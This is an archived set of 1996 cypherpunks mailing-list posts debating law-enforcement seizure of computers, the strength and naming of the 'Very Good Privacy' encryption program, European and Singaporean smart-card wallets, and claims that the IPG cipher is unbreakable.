Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
(408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Nov 1996 21:53:04 -0800 (PST)
To: Anonymous <Tired.Fighter@dhp.com
Subject: Re: denial of service and government rights
In-Reply-To: <199612010225.VAA05194@dhp.com>
Message-ID: <Pine.SUN.3.94.961201004837.5120U-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Nov 1996, Anonymous wrote:

> > Again, I would argue that such a statute needn't even 
> > exist given the rules already well estlablished and 
> > demonstrated in action with regard to indefinate 
> > seizure of computer hardware even in the absence of 
> > criminal claims against the owner.
> 
> Please forgive my naivete, but are there no legal
> weapons available to the 'victims' in such cases?
> I'm passingly familiar with the Operation Sundevil
> fiasco -- i.e., with the outcome re the principal
> 'charges'.  I'm appalled, however, at the apparent 
> lack of remedies for return of such seized property.
> Are individuals who find themselves in such a 
> predicament simply at the government's mercy (there's
> an oxymoron for ya)??

Of course you can fight a seizure, and try to compell them to return your
property.  About all they have to say to get a judge to look at you like
you're crazy is "Your Honor, this is material evidence being used in the
ongoing investigation of a crime.  We can't simply hand it back and try
and rent time with it to do our forensics tests...."


--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 30 Nov 1996 22:47:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Announcement: Very Good Privacy
In-Reply-To: <Pine.SUN.3.95.961201061050.6961C-100000@netcom23>
Message-ID: <Pine.LNX.3.95.961201013725.2291A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Dec 1996, jonathon wrote:

> > > 	I'm not sure how an encryption product that uses encryption
> > > 	algorithms weaker than Pretty Good Privacy can be described
> > Both programs use IDEA.  How is this weaker?
> 
> 	IDEA & RC4 were the only algorithms listed that AC2
> 	doesn't list 
> 	as having a security flaw.  And that isn't even true, if 
> 	one considers "weak keys" to be a security flaw, for IDEA.

My point was that both programs use IDEA, so you couldn't characterize on as
weaker than the other one.  Weak algorithms are an option, but that doesn't
make the program any weaker.

Nearly every algorithm has some weak keys.  One out of every 2^96 IDEA keys
are weak.  If this is considered a security flaw, then every algorithm with
a keyspace of less than 96 bits is a "security flaw" because someone could
pick the correct key on the first try.  Besides, it's easy to prevent weak keys
from being chosen, even though it obviously isn't necessary.

> 	Some of the others are breakable on the fly, by a human.	
> 
> > RC4 has stood up to cryptanalysis.  It's secure as long as the same key
> > isn't used twice.
> 
> 	"Not used twice" is the operative phrase.

That doesn't mean it shouldn't be an option.  I encrypt my files with different
passphrases, so RC4 wouldn't be a problem in a case like that.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMqEqQyzIPc7jvyFpAQHTIQf+LtUIH50HH7FKUGq4i9RgM3yDwXLkL1eV
zQJeO862DGGLF/mYy/vs7UH1NQsTu3XR2pT9tWnurboSJgS8qekUfslGo6wb+gyT
u4RoYV7a+h8A2JTUPQKLbJt6uYVw1jLCFfHlo6xkFP9TGedsVWwdB0hE+gX2EJHl
ckMcFKpdNWkYAcdwhKRdXz/737JDlFvNi4s0DyZ5AgP/bcEVqeb7IpBJPEDlu0Jf
GiwJvxtJ7SAcuvkDSUghKVeS8/uL3S6IRY4Gl+t5SYpO2Pf8bGUW3hl60w7dWQa/
WABQ4iDltFYPzBKoskW4vvaOc4bP7FfqVNgmeQyhKdXBd8nXh60tog==
=T2Lb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Sat, 30 Nov 1996 22:55:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Punative Seizure was: Re: denial of service and ...
Message-ID: <9612010654.AA08123@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text



Tired.Fighter@dhp.com wrote:
> 
> 
> This thread is probably already due for a change in
> the Subject line, but I'll leave it untouched for 
> the moment.

I changed it, because I'm very familiar with what's being discussed.
I also snipped huge chunks, but tried to leave the salient stuff.
  
> On 30 Nov 96 at 13:10, Black Unicorn wrote:
> > On Fri, 29 Nov 1996, Greg Broiles wrote:
> > 
> > > I don't see any reason why this wouldn't be true for a
> > > computer. Fed.Rul.Crim.Pro. 41(b)(1) allows the seizure 
> > > (but seizure is not forfeiture) of "property that 
> > > constitutes evidence of the commission of a
> > > criminal offense". 
> [....] 
> > Recall also that Ripco was never specifically charged 
> > (or the minor charges that they did try to pin didn't 
> > stick).
> > Also recall that Ripco (now ripco.com) was raided with a
> > -sealed- warrant. I dont think that the contents of that 
> > warrant have, even today, been released (though I could 
> > be mistaken).  Certainly 5 years after they had not.
> [....]

Yes, it was & is sealed, the justification being that the 
investigation was "ongoing". The whole thig was weak & shameless,
but it works for the feds. Never mind that it's total & utter bullshit.


> > > But there's a big difference between "seizure" and 
> > > "forfeiture".

Not really. Only technicly. The technique used by LEO's is one that is
known as "Punative Seizure", and is well known in the Computer Underground.
It's standard practice for LEO's to engage in seizure of computer 
equipment and just to keep it. Much of the time it is accompanied with
an explicit and literal threat of prosecution if the unindited suspect
asks for the equipment back. It's cheaper than prosecuting, easier to
accomplish, and often achives the goal of "taking the bad guy off the 
street" without resort to such niceties as having a case that would
hold the moisture of a drop of spit.

It is such common practice, that most hackers who have been around for
even short lengths of time are very familiar with the practice. In cases
involving juviniles, it's a very effective technique. In those specific
types of incidents the drill is as follows:

Suspect "H", a 15 year old male, living at home with his parents, does
something to bring him under suspicion that he is involved in computer
fraud. Incidents are ongoing and seem to point to the suspect, local
or federal agents become interested in the suspect due to information
provided by a C.I. So they go fishing, and seize his equipment.

Seizure is accompanied in concert with several other actions and goals,
One of which is to explore the contents of the computer for further
evidence of wrongdoing. Since aquiring search warrents for such actions
are notoriously broad and relativly easy to come by, this is an effective
technique. The seizure usualy is stratigicly done to minimize parental
involvment and possible protections, in order to give investigators time
alone with the juvinile suspect to question him without the intervention
of his guardians. Basicly they want Mom or Pop out of the picture long 
enough to pump the kid for info before the parents can insist on
legal counsel. Obviously they use whatever info they can get...
	Keep in mind a poorly socialized, but bright, teenager is likely
to be a rather talkative target and an easy mark for interrogatory
techniques. "We find they want to talk, and often brag about their
exploits" is such a well worn quote, that I'd have to attribute it
to about 7 sources if I tried... You can extrapolate on this.

The next stage is threats to the parents of the juvinile, usualy big
federal time, that sort of thing, to try to terroroize them into
insisting on little Johnny's co-operation. Usualy this is done without
the advice of counsel if the feds can pull it off. There's a tradition
of inflating numbers far beyond anything rational, so the "damages" are
insanely high, and markedly fictional to anyone who knows how to cost
such stuff out. It's in the favor of everyone involved to 'play ball'
on cost inflation, for a multitude of reasons. Again, you can extrapolate
why. The E911 case is a great example of fictional cost inflation.

At that point they have Johnny under the gun, the parents terrorized,
and can either work that for further co-operation, or let the kid
dangle for a few years & pretty much make sure he never sees a computer.
What can I say, it works for them. Don't expect them to care any,
they've accomplished their goals. Quite often, as I have said, they
will explicitly say "Don't ask for your stuff back or we'll charge you".
(And YES that is a direct quote given to me on more than one occasion
by people who've had such encounters.)

In the case of adult individuals, the setup is nearly the same, wether
it is a consultant running a small buisness, or a college student. The
only big differences are threats to reputation, either academicly, or
in the community at large. After all, once branded an 'evil hacker' by
the police or media, what company would do buisness with such a 
scoundrel. Never mind wether or not they have a thing to do with
computer security, that part's utterly irrelivant. In the case of
college students, usualy it's a threat of expusion & prosecution etc.
Obviously techniques vary. But one thing is clear, there's plenty
of "examples" that have been made to terrorize people. I'm sure
you can think of a few, and probably will sit there and go 'yea but
he deserved it...' Well, when you think that I suggest very strongly that
you rethink it, and consider that perhaps you don't have all, or even
any, facts that have not been spun and spoon fed to you.  

The nuber of such punative seizures that I am aware of runs into
the hundreds.

> 
> And it sums to a very bleak picture, indeed.
> 
Bleak? heh, get used to it. Hell, this is so damned common that
it's made it into comic books as a normal operative procedure.
Look in "The Hacker Files" to find it. It's a comic book put out
in 1993 by D.C. Comics, and in the Jan issue, Vol 6, Page 14-15
you can see  exactly what I'm referencing. Obviously this is not
something new.

This is why the guidelines that were procured via FOIA by EPIC are
so important. Hell, look at the 2600 pentagon-city case for some
real chilling stuff. The Secret Service mounted what amounts to a
covert operation against attendee's at a 2600 meeting at a mall
in Northern Virginia. 

In any case, the search guidelines are pretty important, so is
the Steve Jackson Games case when it comes to ISP/Web Site providers
and the like. As is the ECPA, as it relates to individuals and 
service providers. There is substantive law on this stuff, you just
have to dig a bit to find it. Some of these "high profile examples" 
didn't work out too damned well cause of organizations like the EFF
& later on EPIC and the ACLU. 

Pardon me if I don't seem alarmed or appropriatly indignant, but I've
long since gotten used to getting calls as 4 am from some poor fucking
kid who's had his life ripped to shreds because he was doing something
relativly innocuous but altogether stupid and disruprive enough to
have him attract attention. Much less having similar calls from peoples
counsels who have no freaking clue how to proceed in defending their
clients. 

As for this type of activity from LEO's? Get used to it, this is how
it's done in America. I'm totaly sure that there's going to soon be
some poor freaking ISP out there who's going to be hit with very 
similar techniques, and in all probability prosecuted to provide
an example or 2. They need a few good examples for ISP's really,
there arn't enough right now. And, I am equaly sure that there's been
some quiet seizures & returns with deals involving "co-operation" 
of ISP's for warez and the like. 

I sure as hell have a very hard time beliving that Sameer and everyone
else who got hit with him by the SPA and their fucking goons were 
unique. I suspect they were to be an "example" however, as the SPA
has a traditional role of both being stooges & goons for Federal Law
Enforcment, and an appropriately one-step-removed publicity outlet. 
The SPA is much like what "railroad security" was in the 1800's,
basicly a private police force that operates allmost outside the law.

As to what anyone can do? Well not much, from what I've seen. It's
just not trendy to defend individual civil liberties, the EFF tossed
in the towel in favor of Telco donations. EPIC is doing a good job
with the resources they have, they could use some serious donations,
and it would be money well spent. Beyond that you have the ACLU, and
that's pretty much it. Too many software and hardware corporations
lost any moral compass at the end of the 80's and in the early 90's,
and don't consider such things to be a neccesary part of their world.
It's hard to compete with guys in black suits who wave the flag allot
and mutter about secrecy and such things. They're the same damned
bunch that want us all to have GAK too, so don't think you're somehow
immune cause you arn't a "hacker". You may soon be a 
"pirate cryptographer", and find yourself in the company of child
pornographers and terrorists. (What? Oh you've noticed you allready ARE?,
well, get used to it, it's only gonna get louder. First they came for
the hackers, now it's your turn.) 


Tim



 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sat, 30 Nov 1996 05:22:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Strong-crypto smart cards in Singapore and Germany
Message-ID: <84936010217079@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday's "Straits Times" contains two front-page articles on the 
introduction of a CashCard which acts as an electronic wallet capable of 
storing from $10-$200 ("Dr Hu launches cash-in-a-card payment system"), and an 
identity card capable of Internet electronic transactions with (presumably 
RSA) 1024-bit encryption ("50,000 to take part in electronic ID trials").  The 
ID card can also be implemented as software on disk.  It appears to be purely 
a form of storing an ID which is then transmitted in encrypted form.  The 
CashCard, on the other hard, is an electronic wallet developed by a group of 
Singapore banks.  There are no details on how it works, except that it doesn't 
have any sort of protection - it's up to you to make sure the card isn't 
stolen.
 
The standardisation committee of the German banks have also produced an 
electronic wallet which should have 25 million (yes, 25M) users by January of 
next year.  Again, this is a pure electronic wallet, with 2-key triple DES and 
768-bit (to become 1024-bit) RSA encryption.  The relevant standards are still 
in the process of being translated, but should be available Real Soon Now (the 
complete specification will be made public).  This looks like a very nice 
system, and unlike Mondex doesn't rely entirely on the hope that criminals 
can't get at the data on the card.
 
Peter.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Nov 1996 23:56:37 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: denial of service and government rights
In-Reply-To: <32A1203E.502B@gte.net>
Message-ID: <Pine.SUN.3.94.961201024623.5120X-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Nov 1996, Dale Thorn wrote:

> > Just in case someone replies saying "It's not all that bad", or "It can't
> > happen here", etc., you should know this:
> > 
> > The United States government has not been responsive to the people for
> > a long time, but what's become evident in recent years is that they're
> > also no longer responsive to basic law and order.
> > 
> > They do respond to extreme pressure, as was applied in the Weaver, Waco,
> > and other similar cases, but, as a general rule, they do whatever they
> > want all the way to the top of the Justice dept. with impunity.
> > 
> > Example:  George Bush's old pal at the Wash. DC P.R. firm hires the
> > niece(?) of a Kuwaiti official to testify in front of Congress in full
> > view of the American people on television, that the Iraquis were throwing
> > babies out of incubators in Kuwait, thereby securing the necessary votes
> > in Congress to prosecute the Gulf War.

At that time the country was already at war and if you read the war powers
act and look at the dates, you'll find that he probably could have
prosecuted it without congress.

60 minutes did a nice piece on this, BTW, and even they admitted that the
wool might have been pulled over the eyes of the Bush Staff.

> > When it was discovered (after the "war") that the Incubator Baby Scandal
> > was a lie, nobody was prosecuted.

Prosecuted for what?

> > Further, in blatant violation of the
> > U.S. Constitution, Bush and Schwartzkopf were knighted by Queen Elizabeth
> > II of England.

Careful.  The knighthoods in question (Knight's Cross of the Victorian
Order if I recall) do not infringe on foreign decorations restrictions
when they are granted in an honorary context, as both were - again if my
recall is correct.

Several American citizens have been inducted into foreign orders of merit
and some have been inducted into badge and even sash orders.

One noteable was even inducted into the Order of the Bath (extra points
for the name of said citizen).

> > There are also numerous examples of the Justice dept. being caught red-
> > handed forging documents to frame people for whom they had no evidence or
> > insufficient evidence to prosecute, and what happens in those cases?
> > Nothing.

Examples...?

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 30 Nov 1996 22:01:51 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961130031128.19278J-100000@citrine.cyberstation.net>
Message-ID: <Pine.LNX.3.94.961201055717.6492A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 30 Nov 1996 wichita@cyberstation.net wrote:

> 
> 
> On Sun, 24 Nov 1996, Ben Laurie wrote:
> 
> > The Deviant wrote:
> > > 
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > 
> > > On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:
> > > 
> > > > 
> > > > At 6:56 PM 11/23/1996, The Deviant wrote:
> > > > >On Sat, 23 Nov 1996, John Anonymous MacDonald wrote:
> > > > >> The good news is that you can prove a negative.  For example, it has
> > > > >> been proven that there is no algorithm which can tell in all cases
> > > > >> whether an algorithm will stop.
> > > > >
> > > > >No, he was right.  They can't prove that their system is unbreakable.
> > > > >They _might_ be able to prove that their system hasn't been broken, and
> > > > >they _might_ be able to prove that it is _unlikely_ that it will be, but
> > > > >they *CAN NOT* prove that it is unbreakable.  This is the nature of
> > > > >cryptosystems.
> > > > 
> > > > Please prove your assertion.
> > > > 
> > > > If you can't prove this, and you can't find anybody else who has, why
> > > > should we believe it?
> > > 
> > > Prove it?  Thats like saying "prove that the sun is bright on a sunny
> > > day".  Its completely obvious.  If somebody has a new idea on how to
> > > attack their algorithm, it might work.  Then the system will have been
> > > broken.  You never know when somebody will come up with a new idea, so the
> > > best you can truthfully say is "it hasn't been broken *YET*".  As I
> > > remember, this was mentioned in more than one respected crypto book,
> > > including "Applied Cryptography" (Schneier).
> > 
> > It seems appropriate to quote Schneier on the subject:
> > 
> > "Those who claim to have an unbreakable cipher simply because they can't break
> > it are either geniuses or fools. Unfortunately, there are more of the latter in
> > the world."
> >
> I cannot argue with that, obviously he is correct.
> > 
> > And...
> > 
> > "Believe it or not, there is a perfect encryption system. It's called a
> > one-time pad..."
> > 
> Paul Bradley and others believe that you can brute force One Time Pads.
> Of course, you cannot and neither can you brute force our system. It is
> mathematically impossible as we have expounded on at length in past
> postings.
> 
> With Kindest regards,
> 
> Don Wood
> 

The closest anybody has come to mathematically proving anything about the
IPG algorithm was what you just said, which is nothing.  "It has been
proven" and "we have posted proof" are neither mathematical nor proof.


 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

It would be illogical to assume that all conditions remain stable.
                -- Spock, "The Enterprise Incident", stardate 5027.3


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqEenzCdEh3oIPAVAQENdgf+KaWnvbuaJ9cNruJCSWV9n32/YOsOZwyJ
HhRLUCrDDhzxMPTOkxmj749qt/mIruOFVjMHBz8bIdnzY43Q16Tt3LTC6cII8pvA
i45R4OLnpG6zmKK+/w2/ewMhdpEL5P8f1Pjlzl3VhBqpriC7S22VIhSrc+gA1WTD
z9UwJDtt3w54i3P74r+n8HFWjN8pI/Mu3S6og1rPytavxf/xlEmnTjEA/bEKEq36
3DSNgLBC7dslm/qvc7UKghKBPhPFGc3LiYGdWamTO2YPtn4+rHb8ObGG+Gy441ZC
fFngIJ8T8cTWEDqEQtkdQrkxuBRueomUsKRygJjpw9it4+wTN7OjKQ==
=nR5o
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 30 Nov 1996 22:19:24 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961130033459.19278M-100000@citrine.cyberstation.net>
Message-ID: <Pine.LNX.3.94.961201061412.6492B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 30 Nov 1996 wichita@cyberstation.net wrote:

> No correct period, for the same reason. To paraphrase Gertrude Stein, an
> OTP is an OTP is an OTP.

And IPGs algorithm is not OTP, so what you're saying is irrelevant.

> More dumbest information, from FAT BRAIN. If an OTP is used more than
> once, it is not an OTP by definition. Plaintext xor Plaintext, even in

Correction.  If I generate a completely random number, and use it in my
pad, and then generate another random number, and the 2 randoms happen to
be the same, they are still perfectly valid pads; as long as the numbers
were truly random.  Don't get me wrong -- its still stupid to use the same
one twice, and it defies the point, but it is not "not an OTP by
definition".

> derivative forms. Like so much of his dribble, that paragraph contains 
> some words but I challenge anyone to tell us what it means. It simply
> does not say anything which translates into anything meaningful.    

Stop describing what you write.

> Frequently, you fill in some, and maybe even all of the plaintext, if you
> have part of the plain text, for example if you have the partial signature
> of a message emanating from the White House of:
> 
>        Wi      Jef            on
> 
> You might reasonably conclude that the missing characters could be filled
> in to be: 
>         
>        William Jefferson Clinton
> 
> 
> Two plaintexts xored together can reveal much more than you might think.
> 

This is, as they say, completely irrelevant.

> Don Wood

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

Unix is the worst operating system; except for all others.
                -- Berry Kercheval


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqEjBDCdEh3oIPAVAQFu4Af+NhUpKK24vICvSbV6v5YdQUxGoegwFk8j
S0K0KM3HN7cLnLDPQPWnjtLROkDmh3RBzYZ9DurJmtVX9qC9d95hca4Z+6jyvdJx
oQaUYFil9X7hukQZPU3idsX6XsmXCJXUpB/v+XktfkeqC0Rzp9h1fAVfAu7JNA7b
q/TbCah4yLe4WZORnySds4nTd0hq19niyO6XCesEddL6DEOS2i5rtRe/ATXSmelu
vX16LpvsUIkiyCLMpnPQWBNZbSPOZ9OXDGgj4NNKGP0EFI/eNzwQdNNuBc7dXELk
+g3Dk7F9co0HhqmoDjoX7B3l3MnvozziepfV7KAh5O7cr+iFa7lecQ==
=aeRZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sat, 30 Nov 1996 22:24:57 -0800 (PST)
To: "Mark M." <markm@voicenet.com>
Subject: Re: Announcement: Very Good Privacy
In-Reply-To: <Pine.LNX.3.95.961130131239.357A-100000@gak.voicenet.com>
Message-ID: <Pine.SUN.3.95.961201061050.6961C-100000@netcom23>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Nov 1996, Mark M. wrote:

> On Sat, 30 Nov 1996, jonathon wrote:
> > On Fri, 29 Nov 1996, Mark Rosen wrote:
> > > 	I have written an encryption program called Very Good Privacy 
> > 	Trademark violation here.   Probably not a good thing.
> Nope.  "Pretty Good" is trademarked, but "Very Good" isn't.

	Very Good Privacy is violating the trademark of Pretty Good
	Privacy.   At least this is a simple, straightforward 
	easy to see and easier to sue on violation than most 
	other trademark violation cases are.

> > 	I'm not sure how an encryption product that uses encryption
> > 	algorithms weaker than Pretty Good Privacy can be described
> Both programs use IDEA.  How is this weaker?

	IDEA & RC4 were the only algorithms listed that AC2
	doesn't list 
	as having a security flaw.  And that isn't even true, if 
	one considers "weak keys" to be a security flaw, for IDEA.
	
	Some of the others are breakable on the fly, by a human.	

> RC4 has stood up to cryptanalysis.  It's secure as long as the same key
> isn't used twice.

	"Not used twice" is the operative phrase.

        xan

        jonathon
        grafolog@netcom.com



	SpamByte:  The amount of spam Sanford Wallace sends to AOL
		   in one 24 hour period.  
		   Roughly 1 000 Terabytes sent every 24 hours.  

	T3 Connection:   The connection that AOL needs to deal with 
		the spam Sanford Wallaces send to them in one day,
		so that legitimate users can contact people at AOL.

	






